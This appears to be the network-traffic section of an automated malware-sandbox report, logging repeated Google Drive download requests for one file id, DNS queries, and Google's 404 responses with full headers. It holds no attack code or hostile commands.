Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /download?id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1RlpQ3zkfkD-DkEAWhZcJ4CYyV_8NhM69 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 16:24:49 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-w4Nk7CPE6cfxidFDK9YX1A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originContent-Length: 1652X-GUploader-UploadID: AFiumC4IZ1UKe95e7eiyaX1aQifSrINwSmHefyMRJ9yGRUoyMXvHLj7LxfWRZYFuz7AzwYF6UYyA-cmuUAServer: UploadServerSet-Cookie: NID=519=oxK-Pf_wBGFUCgok483aELqds_22CKqPi4vyvZDzJE0dW5chLrMP2MCQUcFizTvhM0LeyEfaV2BBIe0Q8--dsolmlKAEa4vcIj0lLaY8D13VTh6G_pkfJKQJAghNKlIkoccI4ljRtkmnMYxcRqwP-VKSXv_IOyY2VvJ6c4CbgiF2HOVyQhcEOXw; expires=Wed, 04-Jun-2025 16:24:49 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=noneAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 16:24:54 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-GiVm0NDVrADNxPcxz8-9Zg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Length: 1652X-GUploader-UploadID: AFiumC5o1xYDUqG2ajoJzKaBFJO3k6UCvcQb-NfDTDZBlPl9uxbVYbT57MUJuqbKFxnYNUogLNSt4AHoAAServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 16:25:00 GMTContent-Security-Policy: script-src 'nonce-le89ienv9uR7cASyrPCOFA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652X-GUploader-UploadID: AFiumC5t0y2VtM-CK-EbMKeuohZ7EZ33MFn_5dSNgMjtAUCn_ClnbzqwZJMqZCfeP1avlzNYtcTkifFe7AServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 16:25:06 GMTPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-NC1mfIp3WMlTLw0xppNdiA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originContent-Length: 1652X-GUploader-UploadID: AFiumC7cWWTZeWJfD90XXaSqZQVdCM0zBf2bmj-R7i3r4NmXeT56BbsSLMj5gdgMUFCadqp-fM3HnY0rIwServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 16:25:11 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-xUDY6CkoU7E52uc_kdM4cg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652X-GUploader-UploadID: AFiumC6ByAr539xd3V7MxLKzhTtql6HdNWSZ6ktJXRrgn8eIM1yqzjYCk3fb8YlRTsho7XjX3pEknKsJ3AServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 16:25:17 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-2j4stuyg7KoLcVdUEhjvMA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652X-GUploader-UploadID: AFiumC5W6vDrPilNTHMEAhKAbFG2rH-PwxMfbrHHuy-YT5fA2KfQ5kpY-6NYLI3k6gWsiPFOmMA5bDtpkgServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
